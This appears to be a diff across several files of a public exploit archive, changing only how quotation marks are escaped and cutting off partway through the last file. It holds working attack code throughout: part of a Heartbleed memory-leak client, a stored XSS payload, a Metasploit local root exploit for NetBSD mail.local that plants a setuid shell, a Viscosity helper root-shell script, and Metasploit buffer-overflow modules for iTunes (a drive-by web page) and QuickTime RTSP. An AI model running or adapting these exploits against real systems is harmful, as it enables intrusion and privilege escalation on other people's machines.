sprintf(host,\\\"%s\\\",optarg);
|
||||
sprintf(host,"%s",optarg);
|
||||
}
|
||||
break;
|
||||
case \\\'p\\\':
|
||||
case 'p':
|
||||
if(iport==0){
|
||||
port = atoi(optarg);
|
||||
iport = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'f\\\':
|
||||
case 'f':
|
||||
if(ifile==0){
|
||||
file = malloc(strlen(optarg) + 1);
|
||||
if(file==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(file,\\\"%s\\\",optarg);
|
||||
sprintf(file,"%s",optarg);
|
||||
ifile = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'t\\\':
|
||||
case 't':
|
||||
if(itype==0){
|
||||
type = atoi(optarg);
|
||||
itype = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'h\\\':
|
||||
case 'h':
|
||||
usage();
|
||||
break;
|
||||
case \\\'b\\\':
|
||||
case 'b':
|
||||
if(ihost==0){
|
||||
ihost = 1;
|
||||
host = malloc(strlen(optarg)+1);
|
||||
if(host==NULL){
|
||||
printf(\\\"[ error in malloc()\\\\n\\\");
|
||||
printf("[ error in malloc()\n");
|
||||
exit(0);
|
||||
}
|
||||
sprintf(host,\\\"%s\\\",optarg);
|
||||
sprintf(host,"%s",optarg);
|
||||
bind = 1;
|
||||
}
|
||||
break;
|
||||
case \\\'c\\\':
|
||||
case 'c':
|
||||
if(iprecmd == 0){
|
||||
iprecmd = 1;
|
||||
precmd = atoi(optarg);
|
||||
}
|
||||
break;
|
||||
case \\\'v\\\':
|
||||
case 'v':
|
||||
verbose = 1;
|
||||
break;
|
||||
case \\\'l\\\':
|
||||
case 'l':
|
||||
loop = 1;
|
||||
break;
|
||||
case \\\'u\\\':
|
||||
case 'u':
|
||||
udp = 1;
|
||||
break;
|
||||
|
||||
|
@ -1316,7 +1316,7 @@ int main(int argc, char* argv[]){
|
|||
}
|
||||
}
|
||||
if(ihost==0||iport==0||ifile==0||itype==0){
|
||||
printf(\\\"[ try --help\\\\n\\\");
|
||||
printf("[ try --help\n");
|
||||
exit(0);
|
||||
}
|
||||
ssl_init();
|
||||
|
@ -1329,7 +1329,7 @@ int main(int argc, char* argv[]){
|
|||
dtlssneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=1;
|
||||
dtlsheartbleed(c,type);
|
||||
|
@ -1347,7 +1347,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=1;
|
||||
heartbleed(c,type);
|
||||
|
@ -1373,7 +1373,7 @@ int main(int argc, char* argv[]){
|
|||
dtlsheartbleed(c,type);
|
||||
dtlssneakyleaky(c,file,verbose);
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=0;
|
||||
dtlsheartbleed(c,type);
|
||||
|
@ -1389,7 +1389,7 @@ int main(int argc, char* argv[]){
|
|||
while(1){
|
||||
sd=accept(ret,0,0);
|
||||
if(sd==-1){
|
||||
printf(\\\"[!] FATAL: problem with accept()\\\\n\\\");
|
||||
printf("[!] FATAL: problem with accept()\n");
|
||||
exit(0);
|
||||
}
|
||||
if(pid=fork()){
|
||||
|
@ -1403,7 +1403,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
while(loop==1){
|
||||
printf(\\\"[ entered heartbleed loop\\\\n\\\");
|
||||
printf("[ entered heartbleed loop\n");
|
||||
first=0;
|
||||
repeat=0;
|
||||
heartbleed(c,type);
|
||||
|
@ -1411,7 +1411,7 @@ int main(int argc, char* argv[]){
|
|||
sneakyleaky(c,file,verbose);
|
||||
}
|
||||
}
|
||||
printf(\\\"[ done.\\\\n\\\");
|
||||
printf("[ done.\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
|
|
|
@ -29,5 +29,5 @@ Stored XSS:
|
|||
http://localhost:8181/editPage.yaws?node=home
|
||||
|
||||
The large textbox on the editPage.yaws page is vulnerable to xss. This is
|
||||
the\"text\" post variable:
|
||||
the"text" post variable:
|
||||
<script>alert(1)</script>
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require \"msf/core\"
|
||||
require "msf/core"
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
@ -13,56 +13,56 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'NetBSD mail.local Privilege Escalation\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'NetBSD mail.local Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit a race condition in mail.local with SUID bit set on:
|
||||
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
|
||||
NetBSD 6.1 - 6.1.5
|
||||
NetBSD 6.0 - 6.0.6
|
||||
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
|
||||
},
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Author\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
\'h00die <mike@stcyrsecurity.com>\', # Module
|
||||
\'akat1\' # Discovery
|
||||
'h00die <mike@stcyrsecurity.com>', # Module
|
||||
'akat1' # Discovery
|
||||
],
|
||||
|
||||
\'DisclosureDate\' => \'Jul 07 2016\',
|
||||
\'Platform\' => \'unix\',
|
||||
\'Arch\' => ARCH_CMD,
|
||||
\'SessionTypes\' => %w{shell meterpreter},
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' => {
|
||||
\'Compat\' => {
|
||||
\'PayloadType\' => \'cmd cmd_bash\',
|
||||
\'RequiredCmd\' => \'generic openssl\'
|
||||
'DisclosureDate' => 'Jul 07 2016',
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'SessionTypes' => %w{shell meterpreter},
|
||||
'Privileged' => true,
|
||||
'Payload' => {
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd cmd_bash',
|
||||
'RequiredCmd' => 'generic openssl'
|
||||
}
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ \'Automatic Target\', {}]
|
||||
[ 'Automatic Target', {}]
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DefaultOptions\' => { \'WfsDelay\' => 603 }, #can take 10min for cron to kick
|
||||
\'References\' =>
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
|
||||
'References' =>
|
||||
[
|
||||
[ \"URL\", \"http://akat1.pl/?id=2\"],
|
||||
[ \"EDB\", \"40141\"],
|
||||
[ \"CVE\", \"2016-6253\"],
|
||||
[ \"URL\", \"http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc\"]
|
||||
[ "URL", "http://akat1.pl/?id=2"],
|
||||
[ "EDB", "40141"],
|
||||
[ "CVE", "2016-6253"],
|
||||
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
|
||||
]
|
||||
))
|
||||
register_options([
|
||||
OptString.new(\'ATRUNPATH\', [true, \'Location of atrun binary\', \'/usr/libexec/atrun\']),
|
||||
OptString.new(\'MAILDIR\', [true, \'Location of mailboxes\', \'/var/mail\']),
|
||||
OptString.new(\'WritableDir\', [ true, \'A directory where we can write files\', \'/tmp\' ]),
|
||||
OptInt.new(\'ListenerTimeout\', [true, \'Number of seconds to wait for the exploit\', 603])
|
||||
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
|
||||
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# lots of this file\'s format is based on pkexec.rb
|
||||
# lots of this file's format is based on pkexec.rb
|
||||
|
||||
# direct copy of code from exploit-db
|
||||
main = %q{
|
||||
|
@ -77,20 +77,20 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
#include <err.h>
|
||||
#include <sys/wait.h>
|
||||
|
||||
#define ATRUNPATH \"/usr/libexec/atrun\"
|
||||
#define MAILDIR \"/var/mail\"
|
||||
#define ATRUNPATH "/usr/libexec/atrun"
|
||||
#define MAILDIR "/var/mail"
|
||||
|
||||
static int
|
||||
overwrite_atrun(void)
|
||||
{
|
||||
char *script = \"#! /bin/sh\\n\"
|
||||
\"cp /bin/ksh /tmp/ksh\\n\"
|
||||
\"chmod +s /tmp/ksh\\n\";
|
||||
char *script = "#! /bin/sh\n"
|
||||
"cp /bin/ksh /tmp/ksh\n"
|
||||
"chmod +s /tmp/ksh\n";
|
||||
size_t size;
|
||||
FILE *fh;
|
||||
int rv = 0;
|
||||
|
||||
fh = fopen(ATRUNPATH, \"wb\");
|
||||
fh = fopen(ATRUNPATH, "wb");
|
||||
|
||||
if (fh == NULL) {
|
||||
rv = -1;
|
||||
|
@ -118,16 +118,16 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
size_t size;
|
||||
int rv = 0, fd;
|
||||
|
||||
in = fopen(from, \"rb\");
|
||||
in = fopen(from, "rb");
|
||||
if (create == 0)
|
||||
out = fopen(dest, \"wb\");
|
||||
out = fopen(dest, "wb");
|
||||
else {
|
||||
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
|
||||
if (fd == -1) {
|
||||
rv = -1;
|
||||
goto out;
|
||||
}
|
||||
out = fdopen(fd, \"wb\");
|
||||
out = fdopen(fd, "wb");
|
||||
}
|
||||
|
||||
if (in == NULL || out == NULL) {
|
||||
|
@ -163,48 +163,48 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
login = getlogin();
|
||||
|
||||
if (login == NULL)
|
||||
err(EXIT_FAILURE, \"who are you?\");
|
||||
err(EXIT_FAILURE, "who are you?");
|
||||
|
||||
uid = getuid();
|
||||
|
||||
asprintf(&mailbox, MAILDIR \"/%s\", login);
|
||||
asprintf(&mailbox, MAILDIR "/%s", login);
|
||||
|
||||
if (mailbox == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
if (access(mailbox, F_OK) != -1) {
|
||||
/* backup mailbox */
|
||||
asprintf(&mailbox_backup, \"/tmp/%s\", login);
|
||||
asprintf(&mailbox_backup, "/tmp/%s", login);
|
||||
if (mailbox_backup == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
}
|
||||
|
||||
if (mailbox_backup != NULL) {
|
||||
fprintf(stderr, \"[+] backup mailbox %s to %s\\n\", mailbox, mailbox_backup);
|
||||
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
|
||||
if (copy_file(mailbox, mailbox_backup, 1))
|
||||
err(EXIT_FAILURE, \"[-] failed\");
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
}
|
||||
|
||||
/* backup atrun(1) */
|
||||
atrun_backup = strdup(\"/tmp/atrun\");
|
||||
atrun_backup = strdup("/tmp/atrun");
|
||||
if (atrun_backup == NULL)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, \"[+] backup atrun(1) %s to %s\\n\", ATRUNPATH, atrun_backup);
|
||||
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
|
||||
|
||||
if (copy_file(ATRUNPATH, atrun_backup, 1))
|
||||
err(EXIT_FAILURE, \"[-] failed\");
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
|
||||
/* win the race */
|
||||
fprintf(stderr, \"[+] try to steal %s file\\n\", ATRUNPATH);
|
||||
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
|
||||
|
||||
switch (pid = fork()) {
|
||||
case -1:
|
||||
err(EXIT_FAILURE, NULL);
|
||||
/* NOTREACHED */
|
||||
case 0:
|
||||
asprintf(&buf, \"echo x | /usr/libexec/mail.local -f xxx %s \"
|
||||
\"2> /dev/null\", login);
|
||||
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
|
||||
"2> /dev/null", login);
|
||||
|
||||
for(;;)
|
||||
system(buf);
|
||||
|
@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if (lstat(ATRUNPATH, &sb) == 0) {
|
||||
if (sb.st_uid == uid) {
|
||||
kill(pid, 9);
|
||||
fprintf(stderr, \"[+] won race!\\n\");
|
||||
fprintf(stderr, "[+] won race!\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
@ -235,16 +235,16 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
if (mailbox_backup != NULL) {
|
||||
/* restore mailbox */
|
||||
fprintf(stderr, \"[+] restore mailbox %s to %s\\n\", mailbox_backup, mailbox);
|
||||
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
|
||||
|
||||
if (copy_file(mailbox_backup, mailbox, 0))
|
||||
err(EXIT_FAILURE, \"[-] failed\");
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
if (unlink(mailbox_backup) != 0)
|
||||
err(EXIT_FAILURE, \"[-] failed\");
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
}
|
||||
|
||||
/* overwrite atrun */
|
||||
fprintf(stderr, \"[+] overwriting atrun(1)\\n\");
|
||||
fprintf(stderr, "[+] overwriting atrun(1)\n");
|
||||
|
||||
if (chmod(ATRUNPATH, 0755) != 0)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
@ -252,79 +252,79 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
if (overwrite_atrun())
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, \"[+] waiting for atrun(1) execution...\\n\");
|
||||
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
|
||||
|
||||
for(;;sleep(1)) {
|
||||
if (access(\"/tmp/ksh\", F_OK) != -1)
|
||||
if (access("/tmp/ksh", F_OK) != -1)
|
||||
break;
|
||||
}
|
||||
|
||||
/* restore atrun */
|
||||
fprintf(stderr, \"[+] restore atrun(1) %s to %s\\n\", atrun_backup, ATRUNPATH);
|
||||
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
|
||||
|
||||
if (copy_file(atrun_backup, ATRUNPATH, 0))
|
||||
err(EXIT_FAILURE, \"[-] failed\");
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
if (unlink(atrun_backup) != 0)
|
||||
err(EXIT_FAILURE, \"[-] failed\");
|
||||
err(EXIT_FAILURE, "[-] failed");
|
||||
|
||||
if (chmod(ATRUNPATH, 0555) != 0)
|
||||
err(EXIT_FAILURE, NULL);
|
||||
|
||||
fprintf(stderr, \"[+] done! Don\'t forget to change atrun(1) \"
|
||||
\"ownership.\\n\");
|
||||
fprintf(stderr, \"Enjoy your shell:\\n\");
|
||||
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
|
||||
"ownership.\n");
|
||||
fprintf(stderr, "Enjoy your shell:\n");
|
||||
|
||||
execl(\"/tmp/ksh\", \"ksh\", NULL);
|
||||
execl("/tmp/ksh", "ksh", NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
||||
# patch in our variable maildir and atrunpath
|
||||
main.gsub!(/#define ATRUNPATH \"\\/usr\\/libexec\\/atrun\"/,
|
||||
\"#define ATRUNPATH \\\"#{datastore[\"ATRUNPATH\"]}\\\"\")
|
||||
main.gsub!(/#define MAILDIR \"\\/var\\/mail\"/,
|
||||
\"#define MAILDIR \\\"#{datastore[\"MAILDIR\"]}\\\"\")
|
||||
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
|
||||
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
|
||||
main.gsub!(/#define MAILDIR "\/var\/mail"/,
|
||||
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")
|
||||
|
||||
executable_path = \"#{datastore[\"WritableDir\"]}/#{rand_text_alpha(8)}\"
|
||||
payload_file = \"#{rand_text_alpha(8)}\"
|
||||
payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"
|
||||
vprint_status(\"Writing Payload to #{payload_path}\")
|
||||
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
|
||||
payload_file = "#{rand_text_alpha(8)}"
|
||||
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
|
||||
vprint_status("Writing Payload to #{payload_path}")
|
||||
# patch in to run our payload as part of ksh
|
||||
main.gsub!(/execl\\(\"\\/tmp\\/ksh\", \"ksh\", NULL\\);/,
|
||||
\"execl(\\\"/tmp/ksh\\\", \\\"ksh\\\", \\\"#{payload_path}\\\", NULL);\")
|
||||
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
|
||||
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
|
||||
|
||||
write_file(payload_path, payload.encoded)
|
||||
cmd_exec(\"chmod 555 #{payload_path}\")
|
||||
cmd_exec("chmod 555 #{payload_path}")
|
||||
register_file_for_cleanup(payload_path)
|
||||
|
||||
print_status \"Writing exploit to #{executable_path}.c\"
|
||||
print_status "Writing exploit to #{executable_path}.c"
|
||||
|
||||
# clean previous bad attempts to prevent c code from exiting
|
||||
rm_f executable_path
|
||||
rm_f \'/tmp/atrun\'
|
||||
whoami = cmd_exec(\'whoami\')
|
||||
rm_f \"/tmp/#{whoami}\"
|
||||
rm_f '/tmp/atrun'
|
||||
whoami = cmd_exec('whoami')
|
||||
rm_f "/tmp/#{whoami}"
|
||||
|
||||
write_file(\"#{executable_path}.c\", main)
|
||||
print_status(\"Compiling #{executable_path}.c via gcc\")
|
||||
output = cmd_exec(\"/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c\")
|
||||
write_file("#{executable_path}.c", main)
|
||||
print_status("Compiling #{executable_path}.c via gcc")
|
||||
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
|
||||
print_status(\'Starting the payload handler...\')
|
||||
print_status('Starting the payload handler...')
|
||||
handler({})
|
||||
|
||||
print_status(\"Executing at #{Time.now}. May take up to 10min for callback\")
|
||||
output = cmd_exec(\"chmod +x #{executable_path}.out; #{executable_path}.out\")
|
||||
print_status("Executing at #{Time.now}. May take up to 10min for callback")
|
||||
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
|
||||
# our sleep timer
|
||||
stime = Time.now.to_f
|
||||
until session_created? || stime + datastore[\'ListenerTimeout\'] < Time.now.to_f
|
||||
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
|
||||
Rex.sleep(1)
|
||||
end
|
||||
print_status(\"#{Time.now}\")
|
||||
print_status("#{Time.now}")
|
||||
register_file_for_cleanup(executable_path)
|
||||
register_file_for_cleanup(\"#{executable_path}.out\")
|
||||
print_status(\"Remember to run: chown root:wheel #{datastore[\"ATRUNPATH\"]}\")
|
||||
register_file_for_cleanup("#{executable_path}.out")
|
||||
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
|
||||
end
|
||||
end
|
|
@ -19,18 +19,18 @@
|
|||
#
|
||||
# Source: http://git.zx2c4.com/Viscatory/tree/viscatory.sh
|
||||
|
||||
echo \"[+] Crafting payload.\"
|
||||
echo "[+] Crafting payload."
|
||||
mkdir -p -v /tmp/pwn
|
||||
cat > /tmp/pwn/site.py <<_EOF
|
||||
import os
|
||||
print \"[+] Cleaning up.\"
|
||||
os.system(\"rm -rvf /tmp/pwn\")
|
||||
print \"[+] Getting root.\"
|
||||
print "[+] Cleaning up."
|
||||
os.system("rm -rvf /tmp/pwn")
|
||||
print "[+] Getting root."
|
||||
os.setuid(0)
|
||||
os.setgid(0)
|
||||
os.execl(\"/bin/bash\", \"bash\")
|
||||
os.execl("/bin/bash", "bash")
|
||||
_EOF
|
||||
echo \"[+] Making symlink.\"
|
||||
echo "[+] Making symlink."
|
||||
ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
|
||||
echo \"[+] Running vulnerable SUID helper.\"
|
||||
echo "[+] Running vulnerable SUID helper."
|
||||
exec /tmp/pwn/root
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
@ -19,51 +19,51 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Apple OS X iTunes 8.1.1 ITMS Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',
|
||||
'Description' => %q{
|
||||
This modules exploits a stack-based buffer overflow in iTunes
|
||||
itms:// URL parsing. It is accessible from the browser and
|
||||
in Safari, itms urls will be opened in iTunes automatically.
|
||||
Because iTunes is multithreaded, only vfork-based payloads should
|
||||
be used.
|
||||
},
|
||||
\'Author\' => [ \'Will Drewry <redpig [at] dataspill.org>\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 10998 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'Will Drewry <redpig [at] dataspill.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 10998 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2009-0950\' ],
|
||||
[ \'OSVDB\', \'54833\' ],
|
||||
[ \'URL\', \'http://support.apple.com/kb/HT3592\' ],
|
||||
[ \'URL\', \'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html\' ]
|
||||
[ 'CVE', '2009-0950' ],
|
||||
[ 'OSVDB', '54833' ],
|
||||
[ 'URL', 'http://support.apple.com/kb/HT3592' ],
|
||||
[ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]
|
||||
],
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 1024, # rough estimate of what browsers will pass.
|
||||
\'DisableNops\' => true, # don\'t pad out the space.
|
||||
\'BadChars\' => \'\',
|
||||
'Space' => 1024, # rough estimate of what browsers will pass.
|
||||
'DisableNops' => true, # don't pad out the space.
|
||||
'BadChars' => '',
|
||||
# The encoder must be URL-safe otherwise it will be automatically
|
||||
# URL encoded.
|
||||
\'EncoderType\' => Msf::Encoder::Type::AlphanumMixed,
|
||||
\'EncoderOptions\' =>
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
\'BufferRegister\' => \'ECX\', # See the comments below
|
||||
\'BufferOffset\' => 3, # See the comments below
|
||||
'BufferRegister' => 'ECX', # See the comments below
|
||||
'BufferOffset' => 3, # See the comments below
|
||||
},
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
\'OS X\',
|
||||
'OS X',
|
||||
{
|
||||
\'Platform\' => [ \'osx\' ],
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Addr\' => \'ATe\'
|
||||
'Platform' => [ 'osx' ],
|
||||
'Arch' => ARCH_X86,
|
||||
'Addr' => 'ATe'
|
||||
},
|
||||
]
|
||||
],
|
||||
\'DisclosureDate\' => \'Jun 01 2009\',
|
||||
\'DefaultTarget\' => 0))
|
||||
'DisclosureDate' => 'Jun 01 2009',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
# Generate distribution script, which calls our payload using JavaScript.
|
||||
|
@ -72,18 +72,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# itms:// or itmss:// can be used. The trailing colon is used
|
||||
# to start the attack. All data after the colon is copied to the
|
||||
# stack buffer.
|
||||
itms_base_url = \"itms://:\"
|
||||
itms_base_url = "itms://:"
|
||||
itms_base_url << rand_text_alpha(268) # Fill up the real buffer
|
||||
itms_base_url << rand_text_alpha(16) # $ebx, $esi, $edi, $ebp
|
||||
itms_base_url << target[\'Addr\'] # hullo there, jmp *%ecx!
|
||||
# The first \'/\' in the buffer will terminate the copy to the stack buffer.
|
||||
itms_base_url << target['Addr'] # hullo there, jmp *%ecx!
|
||||
# The first '/' in the buffer will terminate the copy to the stack buffer.
|
||||
# In addition, $ecx will be left pointing to the last 6 bytes of the heap
|
||||
# buffer containing the full URL. However, if a colon and a ? occur after
|
||||
# the value in ecx will point to that point in the heap buffer. In our
|
||||
# case, it will point to the beginning. The ! is there to make the
|
||||
# alphanumeric shellcode execute easily. (This is why we need an offset
|
||||
# of 3 in the payload).
|
||||
itms_base_url << \"/:!?\" # Truncate the stack buffer overflow and prep for payload
|
||||
itms_base_url << "/:!?" # Truncate the stack buffer overflow and prep for payload
|
||||
itms_base_url << p # Wooooooo! Payload time.
|
||||
# We drop on a few extra bytes as the last few bytes can sometimes be
|
||||
# corrupted.
|
||||
|
@ -93,31 +93,31 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# itms_base_url << Rex::Text.pattern_create(1024,
|
||||
# Rex::Text::DefaultPatternSets)
|
||||
|
||||
# Return back an example URL. Using an iframe doesn\'t work with all
|
||||
# browsers, but that\'s easy enough to fix if you need to.
|
||||
# Return back an example URL. Using an iframe doesn't work with all
|
||||
# browsers, but that's easy enough to fix if you need to.
|
||||
return String(<<-EOS)
|
||||
<html><head><title>iTunes loading . . .</title></head>
|
||||
<body>
|
||||
<script>document.location.assign(\"#{itms_base_url}\");</script>
|
||||
<p>iTunes should open automatically, but if it doesn\'t, click to
|
||||
<a href=\"#{itms_base_url}\">continue</a>.</p>a
|
||||
<script>document.location.assign("#{itms_base_url}");</script>
|
||||
<p>iTunes should open automatically, but if it doesn't, click to
|
||||
<a href="#{itms_base_url}">continue</a>.</p>a
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status(\"Generating payload...\")
|
||||
print_status("Generating payload...")
|
||||
return unless (p = regenerate_payload(cli))
|
||||
#print_status(\"=> #{payload.encoded}\")
|
||||
print_status(\"=> #{payload.encoded.length} bytes\")
|
||||
#print_status("=> #{payload.encoded}")
|
||||
print_status("=> #{payload.encoded.length} bytes")
|
||||
|
||||
print_status(\"Generating HTML container...\")
|
||||
print_status("Generating HTML container...")
|
||||
page = generate_itms_page(payload.encoded)
|
||||
#print_status(\"=> #{page}\")
|
||||
print_status(\"Sending itms page to #{cli.peerhost}:#{cli.peerport}\")
|
||||
#print_status("=> #{page}")
|
||||
print_status("Sending itms page to #{cli.peerhost}:#{cli.peerport}")
|
||||
|
||||
header = { \'Content-Type\' => \'text/html\' }
|
||||
header = { 'Content-Type' => 'text/html' }
|
||||
send_response_html(cli, page, header)
|
||||
handler(cli)
|
||||
end
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
@ -18,131 +18,131 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'MacOS X QuickTime RTSP Content-Type Overflow\',
|
||||
'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
|
||||
# Description?
|
||||
# Author?
|
||||
\'Version\' => \'$Revision: 10617 $\',
|
||||
\'Platform\' => \'osx\',
|
||||
\'References\' =>
|
||||
'Version' => '$Revision: 10617 $',
|
||||
'Platform' => 'osx',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2007-6166\' ],
|
||||
[ \'OSVDB\', \'40876\'],
|
||||
[ \'BID\', \'26549\' ],
|
||||
[ 'CVE', '2007-6166' ],
|
||||
[ 'OSVDB', '40876'],
|
||||
[ 'BID', '26549' ],
|
||||
],
|
||||
\'Payload\' =>
|
||||
'Payload' =>
|
||||
{
|
||||
\'Space\' => 3841,
|
||||
\'BadChars\' => \"\\x00\\x0a\\x0d\",
|
||||
\'MaxNops\' => 0,
|
||||
\'StackAdjustment\' => -3500,
|
||||
'Space' => 3841,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'MaxNops' => 0,
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ \'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0\',
|
||||
[ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
|
||||
{
|
||||
\'Arch\' => ARCH_PPC,
|
||||
\'Ret\' => 0x8fe3f88c,
|
||||
\'RetOffset\' => 551,
|
||||
\'PayloadOffset\' => 879
